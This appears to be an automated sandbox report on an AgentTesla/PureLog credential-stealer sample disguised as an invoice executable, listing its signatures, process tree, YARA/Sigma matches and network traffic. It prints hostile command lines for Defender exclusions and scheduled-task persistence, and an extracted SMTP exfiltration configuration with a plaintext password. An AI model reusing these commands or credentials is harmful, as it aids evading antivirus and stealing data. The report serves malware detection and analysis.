
Windows Analysis Report
TT Invoice copy.exe

Overview

General Information

Sample name: TT Invoice copy.exe
Analysis ID: 1426712
MD5: bf78f7d9bb46ae5314ec7b6d9e651b23
SHA1: 78424f07e9a07b41322a2a91fa71a7db42a8dfd6
SHA256: 76023ee62db39b5f6e730247c677494d69ead6467e2d2d313ba0f7a87f9ce977
Tags: exe, Formbook

Detection

AgentTesla, PureLog Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Yara detected AgentTesla
Yara detected AntiVM3
Yara detected PureLog Stealer
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
.NET source code contains very large array initializations
Adds a directory exclusion to Windows Defender
Check if machine is in data center or colocation facility
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to log keystrokes (.Net Source)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses SMTP (mail sending)
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • TT Invoice copy.exe (PID: 6716 cmdline: "C:\Users\user\Desktop\TT Invoice copy.exe" MD5: BF78F7D9BB46AE5314EC7B6D9E651B23)
    • powershell.exe (PID: 7252 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TT Invoice copy.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7260 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7300 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\pUAQmWA.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7324 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7688 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 7352 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pUAQmWA" /XML "C:\Users\user\AppData\Local\Temp\tmp3165.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7388 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • conhost.exe (PID: 7220 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • TT Invoice copy.exe (PID: 7508 cmdline: "C:\Users\user\Desktop\TT Invoice copy.exe" MD5: BF78F7D9BB46AE5314EC7B6D9E651B23)
  • pUAQmWA.exe (PID: 7612 cmdline: C:\Users\user\AppData\Roaming\pUAQmWA.exe MD5: BF78F7D9BB46AE5314EC7B6D9E651B23)
    • schtasks.exe (PID: 7848 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pUAQmWA" /XML "C:\Users\user\AppData\Local\Temp\tmp3E66.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7856 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • pUAQmWA.exe (PID: 7896 cmdline: "C:\Users\user\AppData\Roaming\pUAQmWA.exe" MD5: BF78F7D9BB46AE5314EC7B6D9E651B23)
  • cleanup
Name: Agent Tesla, AgentTesla
Description: A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
Attribution:
  • SWEED
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
Malware configuration (AgentTesla): {"Exfil Mode": "SMTP", "Port": "587", "Host": "us2.smtp.mailhostbox.com", "Username": "rajesh.nair@grupocatqla.com", "Password": "PMOYQrU0"}
Yara matches (Source / Rule / Description / Author / Strings)
Source: TT Invoice copy.exe, Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Author: Joe Security

Yara matches, dropped files (Source / Rule / Description / Author / Strings)
Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe, Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Author: Joe Security

Yara matches, memory dumps (Source / Rule / Description / Author / Strings)
Source: 00000008.00000002.2889363476.0000000002CB4000.00000004.00000800.00020000.00000000.sdmp, Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Author: Joe Security
Source: 00000008.00000002.2889363476.0000000002CB4000.00000004.00000800.00020000.00000000.sdmp, Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Author: Joe Security
Source: 0000000D.00000002.2888895822.0000000003301000.00000004.00000800.00020000.00000000.sdmp, Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Author: Joe Security
Source: 0000000D.00000002.2888895822.0000000003301000.00000004.00000800.00020000.00000000.sdmp, Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Author: Joe Security
Source: 0000000D.00000002.2888895822.0000000003327000.00000004.00000800.00020000.00000000.sdmp, Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Author: Joe Security
Yara matches, unpacked PEs (Source / Rule / Description / Author / Strings)
Source: 13.2.pUAQmWA.exe.400000.0.unpack, Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Author: Joe Security
Source: 13.2.pUAQmWA.exe.400000.0.unpack, Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Author: Joe Security
Source: 13.2.pUAQmWA.exe.400000.0.unpack, Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Author: Joe Security
Source: 13.2.pUAQmWA.exe.400000.0.unpack, Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Author: ditekSHen, Strings:
  • 0x33f61:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
  • 0x33fd3:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
  • 0x3405d:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
  • 0x340ef:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
  • 0x34159:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
  • 0x341cb:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
  • 0x34261:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
  • 0x342f1:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
Source: 0.2.TT Invoice copy.exe.3a4c0e0.11.unpack, Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Author: Joe Security

System Summary

Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TT Invoice copy.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TT Invoice copy.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\TT Invoice copy.exe", ParentImage: C:\Users\user\Desktop\TT Invoice copy.exe, ParentProcessId: 6716, ParentProcessName: TT Invoice copy.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TT Invoice copy.exe", ProcessId: 7252, ProcessName: powershell.exe
Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pUAQmWA" /XML "C:\Users\user\AppData\Local\Temp\tmp3E66.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pUAQmWA" /XML "C:\Users\user\AppData\Local\Temp\tmp3E66.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\pUAQmWA.exe, ParentImage: C:\Users\user\AppData\Roaming\pUAQmWA.exe, ParentProcessId: 7612, ParentProcessName: pUAQmWA.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pUAQmWA" /XML "C:\Users\user\AppData\Local\Temp\tmp3E66.tmp", ProcessId: 7848, ProcessName: schtasks.exe
Source: Network Connection, Author: frack113, Data: DestinationIp: 208.91.198.143, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\Desktop\TT Invoice copy.exe, Initiated: true, ProcessId: 7508, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49734
Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pUAQmWA" /XML "C:\Users\user\AppData\Local\Temp\tmp3165.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pUAQmWA" /XML "C:\Users\user\AppData\Local\Temp\tmp3165.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\TT Invoice copy.exe", ParentImage: C:\Users\user\Desktop\TT Invoice copy.exe, ParentProcessId: 6716, ParentProcessName: TT Invoice copy.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pUAQmWA" /XML "C:\Users\user\AppData\Local\Temp\tmp3165.tmp", ProcessId: 7352, ProcessName: schtasks.exe
Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements), Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TT Invoice copy.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TT Invoice copy.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\TT Invoice copy.exe", ParentImage: C:\Users\user\Desktop\TT Invoice copy.exe, ParentProcessId: 6716, ParentProcessName: TT Invoice copy.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TT Invoice copy.exe", ProcessId: 7252, ProcessName: powershell.exe

Persistence and Installation Behavior

Source: Process started, Author: Joe Security, Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pUAQmWA" /XML "C:\Users\user\AppData\Local\Temp\tmp3165.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pUAQmWA" /XML "C:\Users\user\AppData\Local\Temp\tmp3165.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\TT Invoice copy.exe", ParentImage: C:\Users\user\Desktop\TT Invoice copy.exe, ParentProcessId: 6716, ParentProcessName: TT Invoice copy.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pUAQmWA" /XML "C:\Users\user\AppData\Local\Temp\tmp3165.tmp", ProcessId: 7352, ProcessName: schtasks.exe
No Snort rule has matched


AV Detection

Source: TT Invoice copy.exe, Avira: detected
Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe, Avira: detection malicious, Label: TR/AD.GenSteal.iagga
Source: 0.2.TT Invoice copy.exe.3a10cc0.10.raw.unpack, Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "us2.smtp.mailhostbox.com", "Username": "rajesh.nair@grupocatqla.com", "Password": "PMOYQrU0"}
Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe, ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe, Virustotal: Detection: 51%
Source: TT Invoice copy.exe, ReversingLabs: Detection: 47%
Source: TT Invoice copy.exe, Virustotal: Detection: 51%
Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe, Joe Sandbox ML: detected
Source: TT Invoice copy.exe, Joe Sandbox ML: detected
Source: TT Invoice copy.exe, Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: TT Invoice copy.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\TT Invoice copy.exe, Code function: 4x nop then jmp 00E353D9h, 0_2_00E34927
Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe, Code function: 4x nop then jmp 04504661h, 9_2_04503BAF

Networking

Source: Yara match, File source: 13.2.pUAQmWA.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 9.2.pUAQmWA.exe.370d0a8.10.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 9.2.pUAQmWA.exe.36d1c88.12.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.2.TT Invoice copy.exe.3a10cc0.10.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.2.TT Invoice copy.exe.3a4c0e0.11.raw.unpack, type: UNPACKEDPE
Source: global traffic, TCP traffic: 192.168.2.4:49734 -> 208.91.198.143:587
Source: global traffic, HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1, Host: ip-api.com, Connection: Keep-Alive
Source: Joe Sandbox View, IP Address: 208.91.198.143
Source: Joe Sandbox View, IP Address: 208.95.112.1
Source: unknown, DNS query: name: ip-api.com
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown, DNS traffic detected: queries for: ip-api.com
Source: TT Invoice copy.exe, 00000008.00000002.2889363476.0000000002C81000.00000004.00000800.00020000.00000000.sdmp, pUAQmWA.exe, 0000000D.00000002.2888895822.00000000032D1000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://ip-api.com
Source: TT Invoice copy.exe, 00000000.00000002.1682284235.0000000003A10000.00000004.00000800.00020000.00000000.sdmp, TT Invoice copy.exe, 00000008.00000002.2889363476.0000000002C81000.00000004.00000800.00020000.00000000.sdmp, pUAQmWA.exe, 00000009.00000002.1721632586.00000000036D1000.00000004.00000800.00020000.00000000.sdmp, pUAQmWA.exe, 0000000D.00000002.2888895822.00000000032D1000.00000004.00000800.00020000.00000000.sdmp, pUAQmWA.exe, 0000000D.00000002.2884744372.0000000000431000.00000040.00000400.00020000.00000000.sdmp, String found in binary or memory: http://ip-api.com/line/?fields=hosting
Source: TT Invoice copy.exe, 00000008.00000002.2885721948.0000000000E08000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: http://ip-api.com/line/?fields=hostingi
Source: TT Invoice copy.exe, 00000008.00000002.2889363476.0000000002CDF000.00000004.00000800.00020000.00000000.sdmp, pUAQmWA.exe, 0000000D.00000002.2888895822.0000000003327000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://us2.smtp.mailhostbox.com
Source: TT Invoice copy.exe, 00000000.00000002.1682284235.0000000003A10000.00000004.00000800.00020000.00000000.sdmp, pUAQmWA.exe, 00000009.00000002.1721632586.00000000036D1000.00000004.00000800.00020000.00000000.sdmp, pUAQmWA.exe, 0000000D.00000002.2884744372.0000000000431000.00000040.00000400.00020000.00000000.sdmp, String found in binary or memory: https://account.dyn.com/

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: 0.2.TT Invoice copy.exe.3a10cc0.10.raw.unpack, J4qms1IPBw.cs, .Net Code: DPj9
Source: 0.2.TT Invoice copy.exe.3a4c0e0.11.raw.unpack, J4qms1IPBw.cs, .Net Code: DPj9

System Summary

Source: 13.2.pUAQmWA.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.TT Invoice copy.exe.3a4c0e0.11.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 9.2.pUAQmWA.exe.36d1c88.12.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 9.2.pUAQmWA.exe.370d0a8.10.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.TT Invoice copy.exe.3a10cc0.10.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 9.2.pUAQmWA.exe.370d0a8.10.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 9.2.pUAQmWA.exe.36d1c88.12.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.TT Invoice copy.exe.3a10cc0.10.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.TT Invoice copy.exe.3a4c0e0.11.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.TT Invoice copy.exe.27fa198.3.raw.unpack, SQL.cs | Large array initialization: array initializer size 13797
Source: initial sample | Static PE information: Filename: TT Invoice copy.exe
Source: C:\Users\user\Desktop\TT Invoice copy.exe | Code function: 0_2_00E30478
Source: C:\Users\user\Desktop\TT Invoice copy.exe | Code function: 0_2_00E30040
Source: C:\Users\user\Desktop\TT Invoice copy.exe | Code function: 0_2_00E36780
Source: C:\Users\user\Desktop\TT Invoice copy.exe | Code function: 0_2_00E67790
Source: C:\Users\user\Desktop\TT Invoice copy.exe | Code function: 0_2_0526E638
Source: C:\Users\user\Desktop\TT Invoice copy.exe | Code function: 0_2_05265F2F
Source: C:\Users\user\Desktop\TT Invoice copy.exe | Code function: 0_2_05265F40
Source: C:\Users\user\Desktop\TT Invoice copy.exe | Code function: 0_2_0526EEA8
Source: C:\Users\user\Desktop\TT Invoice copy.exe | Code function: 0_2_0526EA70
Source: C:\Users\user\Desktop\TT Invoice copy.exe | Code function: 8_2_01014AC8
Source: C:\Users\user\Desktop\TT Invoice copy.exe | Code function: 8_2_0101D037
Source: C:\Users\user\Desktop\TT Invoice copy.exe | Code function: 8_2_01013EB0
Source: C:\Users\user\Desktop\TT Invoice copy.exe | Code function: 8_2_010141F8
Source: C:\Users\user\Desktop\TT Invoice copy.exe | Code function: 8_2_056687F0
Source: C:\Users\user\Desktop\TT Invoice copy.exe | Code function: 8_2_0566C6D8
Source: C:\Users\user\Desktop\TT Invoice copy.exe | Code function: 8_2_05668110
Source: C:\Users\user\Desktop\TT Invoice copy.exe | Code function: 8_2_05667058
Source: C:\Users\user\Desktop\TT Invoice copy.exe | Code function: 8_2_05666743
Source: C:\Users\user\Desktop\TT Invoice copy.exe | Code function: 8_2_05666008
Source: C:\Users\user\Desktop\TT Invoice copy.exe | Code function: 8_2_05660390
Source: C:\Users\user\Desktop\TT Invoice copy.exe | Code function: 8_2_05663AC8
Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe | Code function: 9_2_023184BC
Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe | Code function: 9_2_02317790
Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe | Code function: 9_2_04500478
Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe | Code function: 9_2_04500040
Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe | Code function: 9_2_04505A00
Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe | Code function: 9_2_0687E638
Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe | Code function: 9_2_0687EEA8
Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe | Code function: 9_2_06875F2F
Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe | Code function: 9_2_06875F40
Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe | Code function: 9_2_0687EA70
Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe | Code function: 13_2_016C4AC8
Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe | Code function: 13_2_016CD036
Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe | Code function: 13_2_016C3EB0
Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe | Code function: 13_2_016C41F8
Source: TT Invoice copy.exe, 00000000.00000002.1681301766.0000000002825000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilename8b3ab6fc-321c-43a0-b410-2c0cfa8aa0d5.exe4 vs TT Invoice copy.exe
Source: TT Invoice copy.exe, 00000000.00000002.1682284235.0000000003A10000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilename8b3ab6fc-321c-43a0-b410-2c0cfa8aa0d5.exe4 vs TT Invoice copy.exe
Source: TT Invoice copy.exe, 00000000.00000002.1682284235.0000000003A10000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameTyrone.dll8 vs TT Invoice copy.exe
Source: TT Invoice copy.exe, 00000000.00000002.1679317215.0000000000ACE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs TT Invoice copy.exe
Source: TT Invoice copy.exe, 00000000.00000002.1681301766.00000000027D1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSimpleLogin.dll8 vs TT Invoice copy.exe
Source: TT Invoice copy.exe, 00000000.00000000.1633656764.00000000003E0000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameLhbE.exe4 vs TT Invoice copy.exe
Source: TT Invoice copy.exe, 00000000.00000002.1684161912.0000000004E20000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameSimpleLogin.dll8 vs TT Invoice copy.exe
Source: TT Invoice copy.exe, 00000000.00000002.1685871533.0000000006FB0000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameTyrone.dll8 vs TT Invoice copy.exe
Source: TT Invoice copy.exe, 00000008.00000002.2884747888.000000000043E000.00000040.00000400.00020000.00000000.sdmp | Binary or memory string: OriginalFilename8b3ab6fc-321c-43a0-b410-2c0cfa8aa0d5.exe4 vs TT Invoice copy.exe
Source: TT Invoice copy.exe, 00000008.00000002.2885395199.0000000000B38000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameUNKNOWN_FILET vs TT Invoice copy.exe
Source: TT Invoice copy.exe, 00000008.00000002.2885721948.0000000000E08000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dll vs TT Invoice copy.exe
Source: TT Invoice copy.exe | Binary or memory string: OriginalFilenameLhbE.exe4 vs TT Invoice copy.exe
Source: TT Invoice copy.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: 13.2.pUAQmWA.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.TT Invoice copy.exe.3a4c0e0.11.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 9.2.pUAQmWA.exe.36d1c88.12.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 9.2.pUAQmWA.exe.370d0a8.10.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.TT Invoice copy.exe.3a10cc0.10.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 9.2.pUAQmWA.exe.370d0a8.10.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 9.2.pUAQmWA.exe.36d1c88.12.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.TT Invoice copy.exe.3a10cc0.10.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.TT Invoice copy.exe.3a4c0e0.11.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: TT Invoice copy.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: pUAQmWA.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: TT Invoice copy.exe, b4g.cs | Cryptographic APIs: 'CreateDecryptor'
Source: pUAQmWA.exe.0.dr, b4g.cs | Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.TT Invoice copy.exe.3a10cc0.10.raw.unpack, Lds5plxAPDj.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.TT Invoice copy.exe.3a10cc0.10.raw.unpack, LZYJybC.cs | Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.TT Invoice copy.exe.3a10cc0.10.raw.unpack, wDxPSW1p.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.TT Invoice copy.exe.3a10cc0.10.raw.unpack, E0w8WLnyggK.cs | Cryptographic APIs: 'CreateDecryptor', 'TransformBlock'
Source: 0.2.TT Invoice copy.exe.3a10cc0.10.raw.unpack, ZBSJHga2buE.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.TT Invoice copy.exe.3a10cc0.10.raw.unpack, M4oIYVa.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.TT Invoice copy.exe.3a10cc0.10.raw.unpack, kSS2HMsB8.cs | Cryptographic APIs: 'TransformFinalBlock'
